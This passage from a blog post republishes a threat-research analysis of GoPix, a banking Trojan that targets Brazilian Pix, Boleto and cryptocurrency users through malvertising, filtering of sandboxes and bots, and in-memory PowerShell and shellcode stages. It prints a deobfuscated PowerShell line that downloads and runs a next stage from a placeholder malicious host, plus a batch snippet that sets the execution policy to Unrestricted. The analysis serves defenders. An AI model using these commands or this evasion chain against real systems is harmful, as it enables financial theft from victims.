{"id":1930,"date":"2026-03-16T11:06:05","date_gmt":"2026-03-16T11:06:05","guid":{"rendered":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/"},"modified":"2026-03-16T11:06:05","modified_gmt":"2026-03-16T11:06:05","slug":"free-real-estate-gopix-the-banking-trojan-living-off-your-memory","status":"publish","type":"post","link":"https:\/\/blog.ibvl.in\/index.php\/2026\/03\/16\/free-real-estate-gopix-the-banking-trojan-living-off-your-memory\/","title":{"rendered":"Free real estate: GoPix, the banking Trojan living off your memory"},"content":{"rendered":"<div>\n<p><img width=\"990\" height=\"400\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/16084357\/gopix-featured-image-990x400.jpg\" class=\"attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image\" alt=\"\" decoding=\"async\" loading=\"lazy\"><\/p>\n<h2 id=\"introduction\">Introduction<\/h2>\n<p>GoPix is an advanced persistent threat targeting Brazilian financial institutions\u2019 customers and cryptocurrency users. It represents an evolved threat targeting internet banking users through memory-only implants and obfuscated PowerShell scripts. It evolved from the RAT and Automated Transfer System (ATS) threats that were used in other malware campaigns into a unique threat never seen before. Operating as a LOLBin (Living-off-the-Land Binary), GoPix exemplifies a sophisticated approach that integrates malvertising vectors via platforms such as Google Ads to compromise prominent financial institutions\u2019 customers.<\/p>\n<p>Our extensive analysis reveals GoPix\u2019s capabilities to execute man-in-the-middle attacks, monitor <a href=\"https:\/\/en.wikipedia.org\/wiki\/Pix_(payment_system)\" target=\"_blank\" rel=\"noopener\">Pix transactions<\/a>, <a href=\"https:\/\/en.wikipedia.org\/wiki\/Boleto\" target=\"_blank\" rel=\"noopener\">Boleto slips<\/a>, and manipulate cryptocurrency transactions. The malware strategically bypasses security measures implemented by financial institutions while maintaining persistence and employing robust cleanup mechanisms to challenge Digital Forensics and Incident Response (DFIR) efforts.<\/p>\n<p>GoPix has reached a level of sophistication never before seen in malware originating in Brazil. It\u2019s been over three years since we first identified it, and it remains highly active. The threat is recognized for its stealthy methods of infecting victims and evading detection by security software, using new tricks to stay operable.<\/p>\n<p>The threat differs in its behavior from the RATs already seen in other Brazilian families, such as <a href=\"https:\/\/securelist.com\/grandoreiro-banking-trojan\/114257\/\" target=\"_blank\" rel=\"noopener\">Grandoreiro<\/a>. GoPix uses C2s with a very short lifespan, which stay online only for a few hours. In addition, the attackers behind this threat abuse legitimate anti-fraud and reputation services to perform targeted delivery of its payload and ensure that they have not infected a sandbox or system used in analysis. They handpick their victims, financial bodies of state governments and large corporations.<\/p>\n<p>The campaign leverages a malvertisement technique which has been active since December 2022. The strategic use of multiple obfuscation layers and a stolen code signing certificate showcases GoPix\u2019s ability to evade traditional security defenses and steal and manipulate sensitive financial data.<\/p>\n<p>The Brazilian group behind GoPix is clearly learning from APT groups to make malware persistent and hide it, loading its modules into memory, keeping few artifacts on disk, and making hunting with YARA rules ineffective for capturing them. The malware can also switch between processes for specific functionalities, potentially disabling security software, as well as executing a man-in-the-middle attack with a previously unseen technique.<\/p>\n<h2 id=\"initial-infection\">Initial infection<\/h2>\n<p>Initial infection is achieved through malvertising campaigns. The threat actors in most cases use Google Ads to spread baits related to popular services like WhatsApp, Google Chrome, and the Brazilian postal service Correios and lure victims to malicious landing pages.<\/p>\n<p>We have been monitoring this threat since 2023, and it continues to be very active for the time being.<\/p>\n<div class=\"js-infogram-embed\" data-id=\"_\/fbl3r9GlJoSxY3GUTarZ\" data-type=\"interactive\" data-title=\"01 - EN GoPix graphics\" style=\"min-height:;\"><\/div>\n<p style=\"text-align: center;font-style: italic;font-weight: normal;margin-top: -10px\"><em>GoPix malware campaign detections (<a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144603\/gopix-banking-trojan1.png\" target=\"_blank\" rel=\"noopener\">download<\/a>)<\/em><\/p>\n<p>The initial infection vector is shown below:<\/p>\n<div id=\"attachment_119176\" style=\"width: 1441px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144708\/gopix-banking-trojan2.png\" class=\"magnificImage\"><img fetchpriority=\"high\" decoding=\"async\" aria-describedby=\"caption-attachment-119176\" class=\"size-full wp-image-119176\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144708\/gopix-banking-trojan2.png\" alt=\"Initial infection vector\" width=\"1431\" height=\"493\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144708\/gopix-banking-trojan2.png 1431w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144708\/gopix-banking-trojan2-300x103.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144708\/gopix-banking-trojan2-1024x353.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144708\/gopix-banking-trojan2-768x265.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144708\/gopix-banking-trojan2-1016x350.png 1016w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144708\/gopix-banking-trojan2-740x255.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144708\/gopix-banking-trojan2-813x280.png 813w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144708\/gopix-banking-trojan2-800x276.png 800w\" sizes=\"(max-width: 1431px) 100vw, 1431px\"><\/a><\/p>\n<p id=\"caption-attachment-119176\" class=\"wp-caption-text\">Initial infection vector<\/p>\n<\/div>\n<p>When the user ends up on the GoPix landing page, the malware abuses legitimate IP scoring systems to determine whether the user is a target of interest or a bot running in malware analysis environments. The initial scoring is done through a legitimate anti-fraud service, with a number of browser and environment parameters sent to this service, which returns a request ID. The malicious website uses this ID to check whether the user should receive the malicious installer or be redirected to a harmless dummy landing page. If the user is not considered a valuable target, no malware is delivered.<\/p>\n<div id=\"attachment_119177\" style=\"width: 858px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144754\/gopix-banking-trojan3.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119177\" class=\"size-full wp-image-119177\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144754\/gopix-banking-trojan3.png\" alt=\"Website shown if the user is detected as a bot or sandbox\" width=\"848\" height=\"709\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144754\/gopix-banking-trojan3.png 848w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144754\/gopix-banking-trojan3-300x251.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144754\/gopix-banking-trojan3-768x642.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144754\/gopix-banking-trojan3-419x350.png 419w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144754\/gopix-banking-trojan3-740x619.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144754\/gopix-banking-trojan3-335x280.png 335w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144754\/gopix-banking-trojan3-800x669.png 800w\" sizes=\"auto, (max-width: 848px) 100vw, 848px\"><\/a><\/p>\n<p id=\"caption-attachment-119177\" class=\"wp-caption-text\">Website shown if the user is detected as a bot or sandbox<\/p>\n<\/div>\n<p>However, if the victim passes the bot check, the malicious website will query the <code>check.php<\/code> endpoint, which will then return a JSON response with two URLs:<\/p>\n<div id=\"attachment_119178\" style=\"width: 315px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144836\/gopix-banking-trojan4.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119178\" class=\"size-full wp-image-119178\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144836\/gopix-banking-trojan4.png\" alt=\"JSON response from a malicious endpoint\" width=\"305\" height=\"106\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144836\/gopix-banking-trojan4.png 305w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144836\/gopix-banking-trojan4-300x104.png 300w\" sizes=\"auto, (max-width: 305px) 100vw, 305px\"><\/a><\/p>\n<p id=\"caption-attachment-119178\" class=\"wp-caption-text\">JSON response from a malicious endpoint<\/p>\n<\/div>\n<p>The victim will then be presented with a fake webpage offering to download advertised software, this being the malicious \u201cWhatsApp Web installer\u201d in the case at hand. To decide which URL the victim will be redirected to, another check happens in the JavaScript code for whether the <a href=\"https:\/\/www.speedguide.net\/port.php?port=27275\" target=\"_blank\" rel=\"noopener\">27275 port<\/a> is open on localhost.<\/p>\n<div id=\"attachment_119179\" style=\"width: 613px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144935\/gopix-banking-trojan5.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119179\" class=\"size-full wp-image-119179\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144935\/gopix-banking-trojan5.png\" alt=\"WebSocket request to check if the port is open\" width=\"603\" height=\"278\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144935\/gopix-banking-trojan5.png 603w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13144935\/gopix-banking-trojan5-300x138.png 300w\" sizes=\"auto, (max-width: 603px) 100vw, 603px\"><\/a><\/p>\n<p id=\"caption-attachment-119179\" class=\"wp-caption-text\">WebSocket request to check if the port is open<\/p>\n<\/div>\n<p>This port is used by the Avast Safe Banking feature, present in many Avast products, which are very popular in countries like Brazil. If the port is open, the victim is led to download the first-stage payload from the second URL (<code>url2<\/code>). It is a ZIP file containing an LNK file with an obfuscated PowerShell designed to download the next stage. If the port is closed, the victim is redirected to the first URL (<code>url<\/code>), which offers to download a fake WhatsApp executable NSIS installer.<br \/>\nAt first, we thought this detection could lead the victim to a potential exploit. However, during our research, we discovered that the only difference was that if Avast was installed, the victim was led to another infection vector, which we describe below.<\/p>\n<div id=\"attachment_119180\" style=\"width: 1133px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145127\/gopix-banking-trojan6.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119180\" class=\"size-full wp-image-119180\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145127\/gopix-banking-trojan6.png\" alt=\"Malware delivered through a malicious website\" width=\"1123\" height=\"781\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145127\/gopix-banking-trojan6.png 1123w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145127\/gopix-banking-trojan6-300x209.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145127\/gopix-banking-trojan6-1024x712.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145127\/gopix-banking-trojan6-768x534.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145127\/gopix-banking-trojan6-503x350.png 503w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145127\/gopix-banking-trojan6-740x515.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145127\/gopix-banking-trojan6-403x280.png 403w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145127\/gopix-banking-trojan6-800x556.png 800w\" sizes=\"auto, (max-width: 1123px) 100vw, 1123px\"><\/a><\/p>\n<p id=\"caption-attachment-119180\" class=\"wp-caption-text\">Malware delivered through a malicious website<\/p>\n<\/div>\n<h2 id=\"infection-chain\">Infection chain<\/h2>\n<h3 id=\"first-stage-payload\">First-stage payload<\/h3>\n<p>If no Avast solution is installed, an executable NSIS installer file is delivered to the victim\u2019s device. The attackers change this installer frequently to avoid detection. It\u2019s digitally signed with a stolen code signing certificate issued to \u201cPLK Management Limited\u201d, also used to sign the legitimate \u201cDriver Easy Pro\u201d software.<\/p>\n<div id=\"attachment_119181\" style=\"width: 415px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145213\/gopix-banking-trojan7.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119181\" class=\"size-full wp-image-119181\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145213\/gopix-banking-trojan7.png\" alt=\"Stolen certificate used to sign the malicious installer\" width=\"405\" height=\"483\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145213\/gopix-banking-trojan7.png 405w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145213\/gopix-banking-trojan7-252x300.png 252w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145213\/gopix-banking-trojan7-168x200.png 168w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145213\/gopix-banking-trojan7-293x350.png 293w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145213\/gopix-banking-trojan7-235x280.png 235w\" sizes=\"auto, (max-width: 405px) 100vw, 405px\"><\/a><\/p>\n<p id=\"caption-attachment-119181\" class=\"wp-caption-text\">Stolen certificate used to sign the malicious installer<\/p>\n<\/div>\n<p>The purpose of the NSIS installer is to create and run an obfuscated batch file, which will use PowerShell to make a request to the malicious website for the next-stage payload.<\/p>\n<div id=\"attachment_119182\" style=\"width: 424px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145316\/gopix-banking-trojan8.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119182\" class=\"size-full wp-image-119182\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145316\/gopix-banking-trojan8.png\" alt=\"NSIS installer code creating a batch file\" width=\"414\" height=\"255\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145316\/gopix-banking-trojan8.png 414w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145316\/gopix-banking-trojan8-300x185.png 300w\" sizes=\"auto, (max-width: 414px) 100vw, 414px\"><\/a><\/p>\n<p id=\"caption-attachment-119182\" class=\"wp-caption-text\">NSIS installer code creating a batch file<\/p>\n<\/div>\n<p>However, if the 27275 port is open, indicating the victim has an Avast product installed, the infection happens through the second URL. The victim is led to download a ZIP file with an LNK file inside. This shortcut file contains an obfuscated command line.<\/p>\n<div id=\"attachment_119183\" style=\"width: 480px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145400\/gopix-banking-trojan9.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119183\" class=\"size-full wp-image-119183\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145400\/gopix-banking-trojan9.png\" alt=\"Obfuscated command line inside the LNK\" width=\"470\" height=\"241\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145400\/gopix-banking-trojan9.png 470w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145400\/gopix-banking-trojan9-300x154.png 300w\" sizes=\"auto, (max-width: 470px) 100vw, 470px\"><\/a><\/p>\n<p id=\"caption-attachment-119183\" class=\"wp-caption-text\">Obfuscated command line inside the LNK<\/p>\n<\/div>\n<p>Deobfuscated command line:<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">WindowsPowerShellv10powershell (New-Object NetWebClient)UploadString(\"http:\/\/MALICIOUS\/1\/\",\"tHSb\")|$env:E -<\/pre>\n<p>The purpose of this command line is to download and execute the next-stage payload from the malicious URL referenced above.<\/p>\n<p>It\u2019s highly likely this method is used because Avast Safe Browser blocks direct downloads of executable files, so instead of downloading the executable NSIS installer, a ZIP file is delivered.<\/p>\n<p>Once the PowerShell command from either the LNK or EXE file is executed, GoPix executes yet another obfuscated PowerShell script that is remotely retrieved (in the GoPix downloader image below, it\u2019s defined as \u201cPowerShell Script\u201d).<\/p>\n<div id=\"attachment_119184\" style=\"width: 1441px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145518\/gopix-banking-trojan10.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119184\" class=\"size-full wp-image-119184\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145518\/gopix-banking-trojan10.png\" alt=\"GoPix delivery chain\" width=\"1431\" height=\"231\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145518\/gopix-banking-trojan10.png 1431w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145518\/gopix-banking-trojan10-300x48.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145518\/gopix-banking-trojan10-1024x165.png 1024w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145518\/gopix-banking-trojan10-768x124.png 768w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145518\/gopix-banking-trojan10-740x119.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145518\/gopix-banking-trojan10-800x129.png 800w\" sizes=\"auto, (max-width: 1431px) 100vw, 1431px\"><\/a><\/p>\n<p id=\"caption-attachment-119184\" class=\"wp-caption-text\">GoPix delivery chain<\/p>\n<\/div>\n<h3 id=\"initial-powershell-script\">Initial PowerShell script<\/h3>\n<p>This script\u2019s purpose is to collect system information and send it to the GoPix C2. Upon doing so, the script obtains a JSON file containing GoPix modules and a configuration that is saved on the victim\u2019s computer.<\/p>\n<div id=\"attachment_119185\" style=\"width: 777px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145604\/gopix-banking-trojan11.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119185\" class=\"size-full wp-image-119185\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145604\/gopix-banking-trojan11.png\" alt=\"System information collection\" width=\"767\" height=\"297\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145604\/gopix-banking-trojan11.png 767w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145604\/gopix-banking-trojan11-300x116.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145604\/gopix-banking-trojan11-740x287.png 740w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13145604\/gopix-banking-trojan11-723x280.png 723w\" sizes=\"auto, (max-width: 767px) 100vw, 767px\"><\/a><\/p>\n<p id=\"caption-attachment-119185\" class=\"wp-caption-text\">System information collection<\/p>\n<\/div>\n<p>The information contained within this JSON is as follows:<\/p>\n<ul>\n<li>Folder and file names to be created under the <code>%APPDATA%<\/code> directory<\/li>\n<li>Obfuscated PowerShell script<\/li>\n<li>Encrypted PowerShell script <code>ps<\/code><\/li>\n<li>Malicious code implant <code>sc<\/code> containing encrypted GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix implant<\/li>\n<li>GoPix configuration file <code>pf<\/code><\/li>\n<\/ul>\n<p>Once these files are saved, an additional batch file is also created and executed. Its purpose is to launch the obfuscated PowerShell script.<\/p>\n<pre class=\"urvanov-syntax-highlighter-plain-tag\">PSExecutionPolicyPreference=Unrestricted\r\npowershell -File \"$scriptPath\"\r\nexit<\/pre>\n<\/p>\n<h3 id=\"obfuscated-powershell-script\">Obfuscated PowerShell script<\/h3>\n<p>Upon execution, the obfuscated PowerShell script decrypts the encrypted PowerShell script <code>ps<\/code>, starts another PowerShell instance, and passes the decrypted script through its <code>stdin<\/code>, so that the decrypted script is never loaded to disk.<\/p>\n<div id=\"attachment_119186\" style=\"width: 723px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151017\/gopix-banking-trojan12.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119186\" class=\"size-full wp-image-119186\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151017\/gopix-banking-trojan12.png\" alt=\"Deobfuscated PowerShell script\" width=\"713\" height=\"429\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151017\/gopix-banking-trojan12.png 713w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151017\/gopix-banking-trojan12-300x181.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151017\/gopix-banking-trojan12-330x200.png 330w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151017\/gopix-banking-trojan12-582x350.png 582w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151017\/gopix-banking-trojan12-465x280.png 465w\" sizes=\"auto, (max-width: 713px) 100vw, 713px\"><\/a><\/p>\n<p id=\"caption-attachment-119186\" class=\"wp-caption-text\">Deobfuscated PowerShell script<\/p>\n<\/div>\n<h3 id=\"decrypted-powershell-script-ps\">Decrypted PowerShell script \u201cps\u201d<\/h3>\n<p>The purpose of this memory-only PowerShell script is to perform an in-memory decryption of the GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix malware implant into allocated memory. After that, it creates a small piece of shellcode within the PowerShell process to jump to the GoPix dropper shellcode previously decrypted.<\/p>\n<div id=\"attachment_119187\" style=\"width: 319px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151112\/gopix-banking-trojan13.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119187\" class=\"size-full wp-image-119187\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151112\/gopix-banking-trojan13.png\" alt=\"PowerShell script shellcode jumps to the malware loader shellcode\" width=\"309\" height=\"78\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151112\/gopix-banking-trojan13.png 309w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151112\/gopix-banking-trojan13-300x76.png 300w\" sizes=\"auto, (max-width: 309px) 100vw, 309px\"><\/a><\/p>\n<p id=\"caption-attachment-119187\" class=\"wp-caption-text\">PowerShell script shellcode jumps to the malware loader shellcode<\/p>\n<\/div>\n<p>The GoPix dropper shellcode is built for either the x86 or x64 architecture, depending on the victim\u2019s computer.<\/p>\n<div id=\"attachment_119188\" style=\"width: 457px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151153\/gopix-banking-trojan14.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119188\" class=\"size-full wp-image-119188\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151153\/gopix-banking-trojan14.png\" alt=\"Building the GoPix shellcode depending on the targeted architecture\" width=\"447\" height=\"362\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151153\/gopix-banking-trojan14.png 447w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151153\/gopix-banking-trojan14-300x243.png 300w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151153\/gopix-banking-trojan14-432x350.png 432w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151153\/gopix-banking-trojan14-346x280.png 346w\" sizes=\"auto, (max-width: 447px) 100vw, 447px\"><\/a><\/p>\n<p id=\"caption-attachment-119188\" class=\"wp-caption-text\">Building the GoPix shellcode depending on the targeted architecture<\/p>\n<\/div>\n<h3 id=\"shellcode\">Shellcode<\/h3>\n<p>This shellcode is bundled with the malware and stays in encrypted form on disk. It is utilized at two separate stages of the infection chain: first to launch the GoPix dropper and subsequently to execute the main GoPix malware. We\u2019ve observed two versions of this shellcode. The main difference is the old one resolves API addresses by their names, while the latest one employs a hashing algorithm to determine the address of a given API. The API hash calculation begins by generating a hash for the DLL name, and this resulting hash is then used within the function name to compute the final API hash.<\/p>\n<div id=\"attachment_119189\" style=\"width: 675px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151242\/gopix-banking-trojan15.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119189\" class=\"size-full wp-image-119189\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151242\/gopix-banking-trojan15.png\" alt=\"The old sample (left) used stack strings with API names. The new sample (right) uses the API hashing obfuscation technique\" width=\"665\" height=\"241\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151242\/gopix-banking-trojan15.png 665w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151242\/gopix-banking-trojan15-300x109.png 300w\" sizes=\"auto, (max-width: 665px) 100vw, 665px\"><\/a><\/p>\n<p id=\"caption-attachment-119189\" class=\"wp-caption-text\">The old sample (left) used stack strings with API names. The new sample (right) uses the API hashing obfuscation technique<\/p>\n<\/div>\n<p>The first time GoPix is dropped into memory through PowerShell, its structure is as follows:<\/p>\n<ol>\n<li>Memory dropper shellcode<\/li>\n<li>Memory dropper DLL<\/li>\n<li>Main payload shellcode<\/li>\n<li>Main payload DLL<\/li>\n<\/ol>\n<p>Both DLLs have their <code>MZ<\/code> signature erased, which helps to evade detection by memory dumping tools that scan for PE files in memory.<\/p>\n<div id=\"attachment_119190\" style=\"width: 456px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151329\/gopix-banking-trojan16.png\" class=\"magnificImage\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-119190\" class=\"size-full wp-image-119190\" src=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151329\/gopix-banking-trojan16.png\" alt=\"MZ signature zeroed\" width=\"446\" height=\"133\" srcset=\"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151329\/gopix-banking-trojan16.png 446w, https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/03\/13151329\/gopix-banking-trojan16-300x89.png 300w\" sizes=\"auto, (max-width: 446px) 100vw, 446px\"><\/a><\/p>\n<p id=\"caption-attachment-119190\" class=\"wp-caption-text\">MZ signature zeroed<\/p>\n<\/div>\n<h3 id=\"gopix-dropper\">GoPix dropper<\/h3>\n<p>When the <code>main<\/code> function from the dropper is called, it verifies if it is running within an <code>Explorer.exe<\/code> process; if not, it will terminate. It then sequentially checks for installed browsers \u2014 Chrome, Firefox, Edge, and Opera \u2014 retrieving 